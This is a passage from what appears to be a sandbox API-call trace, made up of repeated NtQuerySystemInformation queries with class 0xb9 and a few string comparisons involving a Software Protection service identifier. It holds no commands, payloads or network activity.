SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.276] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.285] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 